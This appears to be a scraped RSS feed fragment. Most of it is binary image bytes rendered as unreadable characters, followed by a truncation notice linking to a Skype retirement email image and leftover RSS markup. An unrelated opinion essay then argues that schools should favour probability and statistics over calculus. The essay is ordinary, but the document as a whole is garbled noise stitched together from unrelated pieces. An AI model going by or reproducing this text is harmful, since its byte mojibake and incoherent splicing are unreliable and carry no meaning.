\êE’!¯Í)°t™ãdo¹R/×òu’^¢ÔW‡$¦�RǨ¾®¦mÝÍWس*'m7ĈS�ûˆs¤¯êÀ´Ä‹ÔY14øÏÆ:Š1Qôº²²ñ!Mb‘b½6YžÖ\l«ZÇ4u‘S5‘©}–@§ÕVw‡!Ý(þµP¡ÿi4€¡¾¤%92‡Yz%pZ/ÁE·8°Z.N"�©æ†l:Yxtðò'ZaÏ=-èàÉi|ëŽÃ(Æpα¹z•|FÊGäsžM]‘K]½¬I\v†‡Ê7ÿË–‡°@ü. ã†ùä¬ó´5lÍßIÚ�€…¶w‘à‡ý„ãÊ ûsåS­°³2\"F;sç˜./º¤©G;»H“"BôŸñt)‘öqêÙ–§ÔQî ³%È”¶gϲo÷1¥Ž¼ôeåS£ìØ,�Šž+�ƒI}{ a¹l:üÎ ¢vŽ?X©ûc²¬’¶xzû„K¿Øvì0³f†,¸@WšÕKûtŒE†˜±Ô2Ù8½(ƒÝÆa�Ïø‘Gƒ NÇF`ßê“¥.M2NÔ3.ìcÑ“ñ¥-dHš@‡™fAØWˆµ- Žò²p/—âé�þ²ß™ÝAƒ>¡³‘ß*ÒÙ3C Få ¯#ؤ�ô‹¶9Ƹ׆ßÙégVL‚Lu.¬ŠMf|ô! ¢¯2l1fãÏàÛ¶Zûžã�4O©Kýf­A™Øa9&Ó��j¹�ÚMkÉWd@^ÊÚäÎv�9Ó‹9S€93€xšñ$¦Éøöâ$ äp.›Îc¹ÓYÐ$ªÈ8aËJ ZÚº*mȉ¼¡ºbmÉR(¤™ÀÜÓ³µ,ò‚_€3h}à%éE ±Œ–UgmÉXÞ,—¥9jA_S¹Ö­­SºG‚œJ²½z�=N ßÐJ "�@�¾�¶Å‚,Û¥bÖ' ^0u5i«"ZS³±ÿe‘&µW¼4ʳ‚¬Ü|n+¬�öR˜Qa{è�ø=™.Ã’5c5GÒJ% `VJ½v­Ô•N¢C—tlE—òµƒ]¤‰Ž;-CÆIºcû]þdŒŠ`Jêò§Ç¸¶dG�Î;÷%±Æ9Ç»T|ðÀSéØ?ikVK 6`Î>ÛÍcØÀ&u˜¡ 8âÞ½ÜMþ Dpê¹tŒÇTãØÓ:oA¶‰~óÙƒ.AAÁ¿!Dà‘ì ç !˜aÿ¥KñÈ,ó”3ú!ªŠ 9ûºy¤öØÃòô…ý�ãC2žÜÕŽ_Ž3¶/!ŒcÉ=bا>ǃ@^„¶¯X8 ¬´ûqÌ(ÒŒÇ�_ü8Ò6Syº›Êsšt�ír¦r¦rvÒ»¨v‚Jo/= œ\;ÑVÖ˜•׺ Db¾lË^›ÞÚ&©ÊÑK'X«fŽ‹:Rš«’ttË2[UµíäÓÚŽÙÖ%–!gÉ—ñ¨fyë¶Y붉†c£ßø´°"o ªG½”×Ú¶êy$´뙨€oÎu4¤ÐRýT2;ÑL Jš�†5Z†€¼‘B\8mñÕö“f”XœQ ¬L^ì_ÓÈp,‡Fĉýa�¬u†Bl&³G© >³6ýâ¸=õ¸8Å=£úԳǟÕ{cutx44VV­Åé·@eÅ î+±Ë›P¢}‚¥õk[apˆ.â<÷I¸!ç— p7`æG›Ë×°ƒó¹Qêr©3 ="±lÇþûpY—M‰Nì7ýó��§VXñÌ=Ù& ÀØhf¼ø�Iöè#`í¹G·9¨ÒÙ:+zOŠ÷›Ì’>®”€‡'³ñXëâH�‚6.“Ax\ìì,c3À£Š ö¤/è®xB¶µ_êÏf»ù½ë��Œ»,ô²PÝN $¸ç;6Ãe�¤ú˜Æ4]¦Æ¶ì´“”‰ úØÑ!ØvÆžA §m°}ºI—1gÿ[Ÿµ\¶KËTÉÖÉfÊk2%"õ<4Éœír¦r¦rf éd”¿{ìÜ_!½½JǸýíVH4Ñ^ž(ÞªÒFÛ»V©z:Q&�XÒŒ¥R­+Uj�Ñ2YÄ¡°""«ÃÚ¾‘Äqá0Ò¬ql¢LÄ âkW yU§]sܘA �#ƒ“¬mÖÅÚƒ¸Šy*˜L{ ãª$ ŠmÔN«Tž×Ó"Õ'Q%³Pš®ëÆ|ÒµuU)•A’ù¬¢?æLAa!ßÅJÒ8¤u5%/\n´n¤;<>܆óª å.º?ÄÙìçµOöÁ°Dì ¾Ñ_±Š›Ç-ÈxøáѰûîÝv#½üs?&iö±Ç[ÿ?{kY²å÷aqÆ;9VfVÖðêMÝï5›Í&›S“'Ð2lƒ¦@™¢Y_ †m†?ð£m@°¿ ЦI€e™,�l±IS¦HöÄøæ÷jÎÊùæÍ;ß3ÿÿ±Ï>7oÕ{Õ4«^UïuoìˆX±bŊرO¬µcØéÚÕ¸ïì{ÙÝ_Ý”foø–’øö»ótu§•v¥„³4 ãˆ}5~Ë.Eöø„Y•yúÒdhÈØ 8À§�©Döܰ7ç¦ô‰~Y2„�¡²2v˜%à-ýñiË Ç:û”7Œ‰ÈÓÏZéºòó}޳¾y#–¹QÆJíþaËËÊà‡�A¹n­¨¦io–Å1ËÁQ×ìç2í£ Jò™ŒÁµµXBÇBor<¶Òa-²²�}EìOÚ’áD»R;Ú˜ÈPÆÒŠg,gCAãs€Y &N¶ƒ'�±ÿZdŽç+úÖDÆ#mµÃ,šò!LOmȽ‚?†õãQ&ÎlF¤²»\mðÎ+à�ˆ«º¯´�_6(?e’Ÿò™;SyAZÙE;б”‘-rΑÓ++Ñ7¼âT´†í¥ª¸/œÄ‡!ËÌTËèÙ'£ÜS– Ôß0Xm¤À¡Ì#�¶e_LÃè£]_pJe†‡Ù¥·¡éåNŽ:úgPxh 3_P 6ð9�ÆÈùt¡1r>hŒœßPž¢Ú(OÖÇ{¼ü8ÂãB¶ËxU±œv!‹3i8%pK#ƒî¢ «D Æ‹�E“ï%aÒVÚùûýžøŽqAËÛÚ0J<Ë"ͨn´˜—x‡—qÄøÏK D&”ú•šàg€¥!ç¤ | Ù«§_Š–—â„,e.¥Ãƒ´·âÄ" ˆºçz@K<ߥUåÈÏœr¹‘gÁ.…ÓvD¨HçHés)×Oç+Iº¾¡´wŸý.RŒ÷žN¼„ìùþL†Í4Ý�"n#F4–På²oewGF¬p̘Ü�a€"kÅfú?:æà‚vº²›Ò£IÚ$Š?Š*37´ Êî·¿?K_}½íoæ ¤´úd•ƒвŽÑ‚á„âzM4®75 /�¤¤ó�Ix�H®—o#ƒÒ”¯h°Ãó™Vf�>š§[/«[L ðhïÁ åexœÈFý®ì†’‹1` ÕË ¿¤£Íž±Wè:Ëä”.™”dyg3Ï0€ßçÛ9R¼1À\VWußcaö€=/'Éܶ‚å÷¢eƒ>ue†%N÷BÊ�•ZQ5šº�šq¦±ÇcŠàÓÌT'o›Hi´1 Ž!3”ñ¸-£Š²áÇ=Eòc„Ä)gÌÀ!FÏ}ãöͼÁcˆr_˜±Ǭy‘‘™7ø�œÎdô±ì/fp¼|Myc¹åÒ¶aüð�.ÊÍüDÀ÷H†ø£‡óôÅ/·eØÈ ”‘çt‘Ro‚”ËÇ^Yš¸-ÃÕm$‡O�ñ™Å¢ž Úèv�Ãø¢-³y¾oÆ#W W· º?E^#^Ÿ3hŒœO#ç€ÆÈùœÃ‡‘b.-˜Ó¯¤>Z©Ü?”ò¦2Q*QÖ··ÚÞÜÍ{+ÒØ˜µàÞ¶³‰%KÌB ŸôZIJ-KØØ×ÀŒÂÁQJ«ìQ‘…1ûìiM·Ý”Íž ¿(£‡¾‡|´‰BÕ£oc¹DÿøÉÜíͳ²¼(F3],#ĸeÆ,Œ1 › �²yaõ£lŒ/§©Ld(u0oäõ3šq¹’ìç@ñë°ÀpÃ7ð‡ÆÈùt¡1r>hŒœÏ9ÔŸ <6 ¥�a0Â%µŒqå±´·4Þ)�qŸ\ «á+áâYäXàk´YáU•Í_ÎìAZ—5ihëëëR2‡r# ôy¶FÊ€ÿ¤� |»gŽ’È ˜]¹ò”ö‘Ÿ³˜$‚¾ÍO È[(º’« â% �qQn„ª\Ô³/ü�¥ÀrÒâº�¶ž#‹\ >�+ÒGzÜBÊ…À%@´žö‘ ¾¢)dáG¤ä=ÎÒóa?�<Ÿ¦çû/ãºÿ`šödðÜ}™™ "EQëôÛ62ü–}ÔòÐo¼ÞñÛkêÍqÃ-)€gJJYÝ‘‘st¬|2vvU;)¯ Zéüt–î}�Ò—¾{`PÞWÄùP1 ½w_òË{ã5h$ Ê¥ðEAe9؉ ‘·ÞMék_ ÅÙoÓÕ¡ØÑÅÆêÊÌÍ;ï¤ôêëíøèjK3ªÆ öª”ïý#–šqxE'Ô‰©ê³|ëgUíćDãfàÄCBÛ8P=>dã|J›}áT6eÑ–|„–´ó{÷™ù ÃAYò}•M{Ëç0ƒ÷géõ/("|¿){ºϳ;„9Ù÷Z9ã™ :‘[mc—¨˜—YƒÐБC@‰÷ ”„Â@á^Ð&‹Ç2Ø8xC£…ŸY[f^àÇá“Q,/cV�ý/ÌÆyæEt2ünTŠxø~+Œ‘ 4,Ï‘Į̈ø�Ëe#;GŽÌذL�{ÍÑïnýÛhQÝè',Oã͙9rßȆ��Á™ ?ZÚ ZI—i ¶~8âÚ§Á‘†—� Ä›0òã(pºAà Z ø@cä|ºÐ9Ÿ4FÎçx|ŠrjÈÁÅcµ¼> "U׊,ò˜…ùÕÓ,a,ƒå$âlü"[-|!C‰.$ÕÕä¼Ù\±c Úh<–"1 '“ùrqTvÞækZA)äbzk­ŠÚ¶€Èdü¢q m¢.K-«©�ñÅ0�£K¡KÁ™#ø"Ôó–°ü‹rU% =(â‹ÜU^K~ùR” ~ÔÏvÕf…D´}-Iæ)år2ó1Åß}sœNϦi$eC†ÒP^? ¥s‹e]aÈ  òqÑé¬í=2çRz™Åyé&KÕòl�ò£l²±¿+œ7äÏÓ­22PÈU:5Šê|Úò·c¶ù®ŽGò¯‹žz¢ìº¾¢gÿÝ\£Èß3!Mô”Ï hO÷¥TK™¼sCHÉ‹ (¦œúv,ƒ‹Ù%ö’LÅtK|l”@†bÆéfÌ2A{.¥þKô`¥KèÀÐH™Î×9Ü`CÊ|N²­iµ ˾XòöÊD'…KïËa� ,e_ õòÒ(Ñ0Cƒâ>àû/jo)ðl|ǼÈâYR �!Âì‡g9�Urää U˜ºr ÷Ué\6ttbÉ—ÂrZd¤ÍIçÅEQêa@û€cÉ!†å3ûÁ&}Ày(DGøè Å‘ÏQŒÁr*N:ýŒ0ý¤ÌòÔ÷Ý`x�gï§Âq¬6y�Ï}~*˜úré ç2(™=bF,è‚ò“~È̾*Ä#Œ1_øâV´ {† £ÿSÂÙýÞõTzDÌà(>¦—'?òV¨*~|TZŸ hŒœOÊcÙ@ ü‹B�<8.E.RªÔ¥ˆ‚õl —ä ûqIUB�‚(~–‡hM~QíjŒx Šq³¾¾¦~*Åa�†ƒ‘”Ë©d Îù#[d�XÏ`lF8M‘’Ž¿àظ‚]àg€¡3 ÷aš€Óq\Dÿ†Ò¾–¥ð2DB‰:-Bqµ·Œ[yÁ]Ä H*eæôå’¹ ,Õ›BÝæõ=«’kt&@ÁÊÁìå @)ü›@i†ì¥Ze3wg–ž�e”LÒx8–<‘²ÊdOJÞHû&fÊÆ {²³Œ ½‘e@›Ûm+Ê�žÌÒ“GSËÀ²Ä-f3Ö•&%qÀ €k–†Ë°š£œ‹…–Cˆq<4›ñɯîfe“2|ñ5ñ’Bzt’Ò÷ÞÅ:<§wݸ&^W0bÚéD3Ì^ t_¹ªV•Rß•q´ÆÁÂ=‘ÇÆ–Å¡œchðfešÓßPœïÝ“!(c k�ª ¥JÎ<Ãw~PØÙ‡„»¡ö`‰Šó5¾»£zp0Âh¢rh(ɵ¹9÷‡P9*y] 4Î÷ߌo±W #‡�ýÌJ1²º¡v”,�ó¬‹ÊE–àùc¢H$Ï!¥…qõ$†Ë¿0ÐøŽ Fô^Ö&ù覣Í奣aÂ�`ÜPø­9¬²D‹Lñ1PáD‡QpE÷ƒYÊa©XWBqߨÿÃ=¡�ááe{º›¤=Û“á£8³ApΫ>‚15VÃ0£޽4äÈï#ÍÈÎþ^Ãhfr>ÇðCžžH¾œh1, .#®ž¿�0þ9œ]® \D>ô±ÎhÊ.ã(¡E8ll¬IèKAyg<Ƹ‰% "UQ¹p NSƒ@s]ª}Hr¾*„W¶‘}QFÉ�ñNª§)üBsE|±½jɘ w0€ÈÅKÐPO¯sÊázD)nƒÂ³îpœ@Æ™I ”úY-Qab Šä,}ðpœþñ¯§÷8-íZG÷¿cm­Ïr2–åt¤8²q¾åãxO�Ûéå»/ã fO˜¹9<�ûÇ>~ö®ïÆr,–K¡´[—rjÖ&¥‡!€R[¾™S€ïÓ\ÙQùJ;“ÊÇ7Q¨QÄQXÙ Ž±ÄG¯Ê�`v‡0tlð÷QÒ¢(…÷ÚµhWîJ8§¼±Gf}ƒïþ¤ô`¯å�R „b pÜ5 *3œò…¡À=  1.¸£�h$ 1ßàÁp´1£Œ,û¢ÜØT3D'§ítýêÜ3P|LÔ37’‡™!â_Ìp\»ÞJGG­´¹†â¯‘Ct,—�fž‰°xÕ%î1{ PúÙ_²è<Ãñ¤±Ä #€¥gðD~ì%h¹ß¦ç¾©Mh÷²ÌŒŠÄľœ˜ cihøÑv OŒêŬljŒB6üÓNð‡`?²L§!÷s½%MNóÌ tº¯´¿�4ñÄc/´î' 1`ð‘ êÆ ú ý'è cùž}|k›–M–×OŽþá…‘Ö_Õ=“Vöá (icd ¯9Ÿx,Òr WO»Œ¬�Ï439Ÿ.è±k �~»ð‚ª®QéæRø¡4Ky¨Ë8ë*\@ËáÕÉ�.,ƒìÒˆ™ñ(!‘^HJ]ÖÖV5p÷Ó@ÚÏh<’"4O46à2ã .¹XBáW2¡ð@]rš àêPÒ‚Jn�X�ÉÀ›_Ns ]ñ3\VîBU˜†Ád‰¾VH(‘„¡ÍA4F 'Ž«<]ã¿Ätášùs_ìå¼c"X!Kür¨xÈQåªeã ‰Ýí¶”ºNºzUÊbk–ŽÆéþãi:ϼQ~4”ÊË.xi¤=)‘;706æéíw¦Re‹!/¯ùX'§’I/ô&ú™F˜± �ãc){¢·-E•=: ž’w$¥—“·¬lKé½q- ,”XfxBö¸z‰“Ê`Óü.ßëšÓÉ(Åò\ÂL£0P»(¬ª×Á�”æüVMwgÃ#fw®!S{žÉÐ{&:”|Œ&f¬ºmNJãkûº/â»÷džž=a߇ VÝ{VÀðâØafWhfr>§À`¤?«£ j ü4ý�GŠ|ЛØ°,?‘‹HÅÛ#(Á…±P2-”ó�k¡*îB ǵžî7»J^]å€�5) ¹‘o œªÓ-CÐY�„ èâU¸$Ô¡†32£Hf¤qePd‰�ÈQ—ÉÁŒSE%ž‰J3—ïxN¯A)‡ö©Œ‘BB¸Ž°g¤ Óæà‹ Ä’µÐ ñòD�Œ`Ð…—ït…Ã_0LÓ7¾s–~éW�R»'ãÂ38�Ô—BÇ,K¨îÞíZÁ§ß¬“.m¥»·¢°X=–‘ñ’ŒŸÕ5)ç(¿ÊË2(–ª°¡ÿJœŽ†‚Kž�ƒ>À)X7eØxF`Ê)oÖ³HzÊIhRL9ŽÚ3`•Øú# (ûX=M髯JéUYs)®¼m§Ê(«(éƒsï§ôÚ’Qå¡$£ÀRƹÊà¤1”ñ÷>HéÕ—‰«|+êѺþhgV`9ˆàå;âA]•*,ìð\hŒœÏ!è©)`õ@ÿñ4]þH½ˆÕX)y9UÞ2]­3/ÞÂåñF6Խ圡²�- (2f!‘Ç«äØØÜð,Îp8ô,Î�/"K?Áƒ,‹ppªª¤%,À5S¢¤*Zý)RòeÌ qÀ �èhTDèÒE&A.š¥êTô9\<Ó_CÆ™»ËdZƒÂŽšŽ|@I„…KÊ[=_�, „ïa)€a! ðªÊ8A…3o…$x)ZqþdÉÚ½Ãô_þƒ#¦#üj¯#¥²“Ú2bÚÒLW¤´±¼j:í¤—eð`dø›7R{²Od$¯‹¹ŠÀ`yõ†E¡ìEë±Äh4aIËÈ0$b¦Ê2,–Žaݼ{P|̱”d+�°Ïõ?®Ìæ \úèfT„^û�f~Ûó* « )Ñ´Jé”Ùå©< »0ÈPVcFƒ%NT›ù ò!Pf'¬äº�Uøªž|´#îÖMñáæË¹È‚ pöÿÐ}hCè0� Ù�ÕÞׯ©n0Gt蔇™6îÉã'aX²ôÍísF³`SYµ6”T—¡ÚŒ%tÔ‹�ÈÒðUN n fë0bèˆNûR&e¿ýö<ýä×to”Ï3CbÄ]�;Ÿ $ÑîíÍÒîUöE››NŰã„ãÂùN‘ÛXô½þݤ®& �lHy)Ï åt$&÷YÜÎ’CŠì>º?óÂg¶‡öqÛËA陿 æ«hå‹ξ…'PîqŸhŒœOôX5Ð@.fò€Åð{^ !øR/ì›3ÎÙb¸Pâ¯Æ­–u‘ÂÛ÷U8S�Êiœ¢æ‘wi@5*\¤›,cP\L’]�(òÀr-ƒ·�“y.ã8^d7±Rô_0{Æ€Á)\–`Sgžc(òì2±•-…«¸#þ¯`ÑjجûUX�*îJù¯’Hí›™&`Yñ!\å Ì•¸|g-}|(të«í´ÖcÿÊ8œÎÒP 3ü3ª˜q¯cé†!+y&˜Åá¾�iñ)Æ 4žÈï/})Ú÷ý÷ÔÏâÐú†(‡7Õ‰}32fÔW¸ož!T³4,%c†™¹Áðá;P´Ex"ÊŒ$Ê�ê¾Ò�Šñ…± €ãúÈçR´¤ôa‡Eã¶DÅ‹\åÅÏI ��Ó@ôø5Ð@ò˜T�0®Õt‘¨P%\Ç]$ç |ƒ7ã]óSÊ”oü2ùü§4Uð„Ù³) •t"-d<KaŠïàdö[Fˆ¼\N) È´xÅ…² ½K¯þ"”P.»dŠ_ä/Š\Â|0*|Mþr J-ñà)l¤—‚“‹¦’Á<üo\ÆûÏ� ÁÌ£bmEþe(q|QȻȳ’G~Ô)kaä)Ùá¬tHWWÚ2Tº©'Eo¥'ý|œž=É™¤¡^ ™©”ÃU”Kñâ;1+ë+µ<o•Á Æ UJ'R¯°´Gqé™ééÁÜG<û¥¶â7¯a\Œ½-ȈÒÈqÒÞ‹!Í’Ù no’gfA´ìψ·õ,½b™œxª‡Ç-ŸºWxHW•,¥Z4KÊü±Í#ÉòLùe| »—1Jvf*�—rî=�dÂ1„¥ÁÑ |·åêuf¨ZéìD†Úcê-…YŠ.£)¶ S+[ÌdH!Þ?h§#Œ‹Q–Úm^r_¿2³<(á|ˆÌlÐåûÄÌ {€0lFçÂIŒc;Âa,¨ËŽx*üðH÷G8HÄpA ”žÊaR…eqjfFŠAzì˜A.p§bZ8f–˜aa?û|€¡úB(ø2br^ŒŽl¦àµµXzˆ1ûPm©d¥Ó×Ô®´§ÒØûRâõL$òy_Ž ŽÖ†öî+!Ëý{|¨6êèY$•Kù»;ä¢Ï„±õè¡ _•kÃq¢É½7‡}L¾Âcè°¿ˆ4j¸wÌÄÐç¸?,+ÄÀ+Àþ*d¢ó,M1^ä³3¸)ÍåЧ‚74¦».÷#á‡4Ð@—¿� 4ÐÀoPãƒOŒ\çZ† Œ?  Yp«Á…‘°C­Y”ŽæR�­ËϙУ¤;Xù[_[÷@<�N¥hLäò1Ñ&Ì~(UËr•d1….à 5~�[„Á¢/`�«3,h�8à,–­Ç2aãD@¬o¾ ¯«Y•ƹ5êÉ2™/‹ô¢ì,Ò#Œ$u\�Ë\.h\ý U]ì×ï›p�Gqç�737)Õ(�[W¤KÑfVáƒÆéù±zå=AÆ0v˜á¡Ç¢L_‘0ƒ6—æNæ(î˜�èøP'ËÅ8¹#mp:—‘F œø€)‡B ´³Ô�Š2“F•¹ø£šâ‡¡°­ºñ2� §ç RMœz–6’es“}YÊ’7ð�†±¼Ï³6¢�XΘ¹Û’!ŠAqïý™�ú"Æ Ï òÄ9¶››ôXÆ#³<ԯ̚¯~A†µÚ £Þ<ª#tÊéû†QtýF+]½&™tßö÷ÔVâAß cG­¡º!;÷iC}žôÃ(ƒ¾À‡#¤™•¡,#’v¢,pí¶)ülÄ‘&™ 4„¤é(u!^øfï#à‡S4Ð@/ByÜh �Êxc˜\ü�XÜå`Jk Ž.Á 9!»„®Ó ¸„¿à›ãòPDÖ7Ö¥|öbù�”¾‰S>öYJ¨U±ÎÑTdB®“&«’0uºE;żâ­ÀEzdBV4K° vzV<À'yC¦â@.Âõë²_Âb\¨§Ë°\ë®äq¬^ÈQÒ Ôe¬z9"ßÿD‚åÛ+8 8ÐŽ(§ì‘9ÌÒHí~.en¬ð|HŸ˜ûmÿÚF+�OÓ÷~0µá 8)Ù3?}F5oÁ…JOžÍÒs,|ç…�½3>L@t¡Kù”Âût¥3–O½ô’¤QÚ¹Êf©yù¨({…0žx{~WÆoñQày[OK° …9Ù$yE+~§R®ï?Pšò�ÎC>ö‘°4ìæK2äÖ¤x+ß÷ßdÿJÛJ. FA[´7o´ýqRöÁ<{Ê,d‘Q'%œº1ó‚r¾ºÞöÒ46ÐÏ1DÇCV6¼¿úr,Å;8TžÇR3öåØèÖ-áHböó`š´Óþ¾î¤Œ2*g›™ÝžYî1uE©G›^‘±Ãžf|ŽŽiËøÈ)ü”ų)‹<ÿÔçDÆÕþ3z†jÐÒîlº_“ဌo´qO÷N,\¾OË|l$Iî Kß(ÅŸžbÈÑî·tßh‹cË´3ËϨ<3Rð¢\¯_k»­öÕ‡öö2!sÌV…Q�Ïž%fY8P!š!Ê¥]<ó&^”ŲF¾ãóô‰©\'Ò™1‚~s £(Ž>§,ê*VÁGÆŽ8�6fTG–¾‘£†ºq¿É§÷h’á¡ð1�—a)­�øX G²�~gBQ ?6Ô¡¾lúè±I©h69ø"’«‡îŠ40KefÈLPá+Ê  ëH3é§+Ž|ø‘A˜Ù Å]„:ÊáŒ(g¿ «cއ”¡XãG� M�’Rá¨S¾� —äWÅ+—±µ{!w'ÖKuîPˆäÕÜ"õ� ^¦u´Üï2,c–ÃÒ�2b!a¡ˆÄFm·$N´ù"ãRâÀ)‰%<7¯÷ÒÎf'MÓ´¿7‰™%tiI[kËæ‹üÌrpfñðl–޿Ǧsfr¤èÊñ¦e´'e%™ó+Þ{ˆÁRîmÌ¡8¢°²åðéÞܰ¬Žüׯ¶ÓK7#÷�º¡/2[àMãœ|¡Ð¶Òã§’GJ*3%>™Mr­¯ÎÓ+¯„qÇDYòÅŒ §}‘—•ž,´/¿ÁIg3��¥¼‚ f PÂWdÄܼ­ *÷@Ê737²eÒ¡ ?3ÒîY~uëŽî‹ŒEfe˜Q™ÈD.Œ*ÈnÞ 3Iâs¢rدÁ,Ë¿ü“¤Ëõ›m“Q,scvçá“ØÓBYV^ï‡íd"#FÆFGù¨%3·nÍÓ«w£ÿÓf”SÉ�qjƒBlÊx–RŸýüÍ–Â1«¿VÚP:'Áa0Ë®�Â>!Œ`f‚h{p,÷‚ŽûY [äÙÚR›Ë0öo�û` ¸¿à1oßR;*=f·øÖ �À’2úFK éKÕ×h >œ–Ǿ*¡]_–2rœ8œ¸Ç6D$›�¢¼OœºSWN�#�åzðâ©ó œŒ+<=éÔ‰r`Îý¤î´'(’ày «Â,¥5Ð@ #§�ß±`ÅäÃà_ÂÀ²\ÜG„ òB+Œ‚F#-£ /p&� Úˆ,8d"ÿ±gfå r–‘L5H3Úg¨F×àQ`)V�sB c ŽBJ™YJ¡:¯ËK»J„ÎJƒ.æQkØÀäÒ�-;Ó˜,Ófϼ"h¸Ø'J¬ÐÇ%H}q¸ýPºPv+¸˜GqÊ‹` Õ�úe™Ì/3 lCÊÈ”ä¥B ˆ>ßCŒœ­�Ž _”÷yÚÜn'>‰¢ýüùØoê§Òž1fXÎ$ûÅ #٤װ„Œ�sZ”ã fføÊýæ ,JhJ÷³Œ‰™‰P°ù'Æ Š­•ÜyÛK¤P’QŠÙ×�²ËÌ K˜Ø{âÊ+ £»¬òÞ¹§)› ÕAJ'Jï™”çŽ7˰ñ?¥�-(σ‡Ì>D9,ÁbùYWÆ ßðaÆ �ôDFËÔØ3ã“×Ô6pÂÙØj¥ÁY+=“RÍì 3Ìð¸5¥Doï0Ë ÃD¸=)æÌÉhÁpP›`ô¼$yøÈ'u`OòKisî3rÎäº'´…JŽÙ9ú.†e1 écªk_Fûo0R:ªåt6úÇ|“~WUiyÁq"t48F ÇkÓGnª?‡‡a|±ëXŽƒžû÷›{Æ^1tÊ!Ð`$r0ƒ!Äõáb6x¨H—­d Æ=B¾hWÚ,|g†NVÜWÚ²;<¿ñlš8 l �~ûÐ!ý @s„ôçüý�ÇèCSs¾*}‰°R_LËЊvÃp *p‘‘QT~=S‰\Ž·5’ïlmI“褞”º‘FfÜÙù@ƒ3üÅŠ‘¾dÔÈ% rE©°-iEâŒÐ"\b€0…pá]¥œPù£É¢®ø¥PyEÇ7a† ¿€Ì@2†®ù% Tô5(|€ËÒ�œ¼, �:m‰Ëw­�íd´A½=r˜‹ÛîV¼äǬG@Q¦JžúÏ?ŠÛ£ÇÃô×ÿ_OÒ{FiC /û)z+Ý´ºÞMký®•¼½ýVúêûhŠîG[›m7��ÅŒ³#ŸÄ²¦»RЙ@Á³Bªt`8J剔ߗ®«" ÛA@³ª"¨8Jè­—0¨h‡\79N¿Â(â4²S)õ>%MŽrÌGŽCˆß؉٠×`¡vS}IãMýX²ïlK)–AÂŒÆúFlÄGIGñ?<�pj«Œf’”£EÿvÈÅFwŒ�)Ñ(óÌT±Ä,š\õ“÷Á}ŒÂäŽOgéÊn|œÓM#@yg‰Þ:'¹¡$+ÎqƘV¥°×†åa8>ZÊ>$ Iî¿Ëᩌ3ÚÆ{T”‹~P_–×q¯Ê?Ù÷Äý ŒƒÒ÷ c%f�Pþ9>›0 ? pä^ë? 7@HfÌèŠTÐ1«o€ÙhhSf�0¨0ìh?fËØŸE�™–‹`ª/&jý ÉO>ìÉ, ÷ cŒ4øA<ßg¹hÝ„áDËñÝ´Où~��ÝnŽÁ¦Í¡ÃqohóøFF;ý'ú®áÓ–úM•áÄ�Ü·I¦Ë$8œ6dñ+D•ÔÀgš#¤?]hŒœO#ç³ …

    Article truncated for RSS feed. Read the full article at https://taonexus.com/publicfiles/feb2025/skype-retirement-email-28-february-2025.png

    ]]>
    https://taonexus.com/publicfiles/feb2025/skype-retirement-email-28-february-2025.png hacker-news-small-sites-43207777 Fri, 28 Feb 2025 16:57:37 GMT
    <![CDATA[Math That Matters: The Case for Probability over Polynomials]]> thread link) | @vyrotek
    February 28, 2025 | https://anandsanwal.me/math-eduction-more-probability-statistics-less-calculus/ | archive.org

    probability over calculus - math that matters

    This essay first appeared in my newsletter. Sign up here if interested in F’ing up the status quo and fixing education.


    When I was in high school, students divided into two camps: those who “got” math and those who believed they simply weren’t “math people.” 

    I was one of the “got” math people who spent countless hours doing trigonometry and eventually doing AP Calculus where I was doing derivatives and all sorts of ‘fancy’ math. Deep down, I knew what this was really about – it wasn’t about practical skills but about signaling I was smart, just like the other high-achiever types. It wasn’t about learning. It was just another credential for the college application rat race.

    Meanwhile, some of my friends struggled with math not because they lacked ability, but because the content was so disconnected from anything they cared about. When any of us asked the teacher when we’d ever use this stuff, she gave the standard response about college preparation and developing abstract thinking skills. 

    But looking back now, I realize we were all learning the wrong math – both the students who excelled and those who gave up. It is yet another example of how schools fail teenagers.

    The math most useful in real life isn’t calculus or advanced trigonometry – it’s probability and statistics. And yet our education system treats these subjects as afterthoughts, typically confined to a single elective course typically in senior year, if taught at all. 

    This is backwards.

    Consider what probability and statistics let you do: 

    • understand risk in everyday decisions
    • detect misleading claims in news articles
    • make smarter choices about money; and
    • grasp uncertainty in everything from weather forecasts to medical tests

    A teenager who understands basic probability can immediately see through the false promises of gambling apps targeting their age group. One who grasps statistical significance can better interpret health studies they encounter about supplements making grand promises about physical health. 

    These aren’t “someday you might need this” skills – they’re immediately useful.

    The evidence and arguments for emphasizing probability and statistics is compelling:

    • Daniel Kahneman’s Nobel Prize-winning research reveals how humans systematically misjudge probabilities in predictable ways. His work with Amos Tversky shows that even simple statistical concepts like base rates and regression to the mean are counterintuitive to most people, leading to poor decisions in everything from medical diagnoses to financial investments. Teaching probability early could help students avoid these cognitive traps.
    • Jordan Ellenberg, in “How Not to Be Wrong,” demonstrates through dozens of examples how statistical thinking illuminates everything from lottery scams to political gerrymandering. He argues that the mathematics most useful for citizenship and everyday life isn’t calculus but the ability to reason about uncertainty and variation – skills that probability and statistics directly develop.
    • Bryan Caplan explicitly argues in “The Case Against Education” that our math curriculum teaches skills with little real-world application for most students. He points out the mismatch between the predominantly algebraic-calculus track and the actual mathematical needs of most careers and life situations, which more often involve understanding data, risk, and basic statistical concepts.
    • Arthur Benjamin, in his famous TED talk and subsequent writings, makes the case that statistics should replace calculus as the “summit” of high school mathematics. He argues that for most students, statistical literacy is far more valuable than calculus in a world increasingly driven by data and probability, yet our curriculum treats statistics as optional while pushing students toward calculus.
    • Andrew Gelman, one of today’s leading statisticians, has written extensively about restructuring mathematical education around understanding uncertainty rather than abstract proofs. He advocates for teaching statistics through simulation and real problems, suggesting that even complex statistical concepts can be made intuitive when presented in contexts that matter to students.

    To make room for more probability and statistics, we need to be willing to cut something. I’ve previously argued against Shakespeare and other subjects here.

    But if we’re focused on what to downshift on within math, the obvious candidates are topics like advanced trigonometry, detailed polynomial factoring, and calculus for non-STEM students. 

    These are precisely the topics that prompt eye rolls and “when will we use this?” questions from students – because they’re right. Most won’t use these skills unless they pursue specific technical careers.

    But teaching probability and statistics well requires more than just changing the curriculum – it requires making it engaging. Instead of abstract problems about pulling colored balls from urns, we should use real-world applications that matter to students:

    • Sports Analytics: Students could analyze their fantasy sports team performance using probability distributions, calculate the true value of different player stats, or determine whether a winning streak is skill or random chance. A basketball fan might learn expected value by calculating whether a player should shoot a 3-pointer or drive for a 2 based on their shooting percentages – mathematics that suddenly matters when applied to their favorite team.
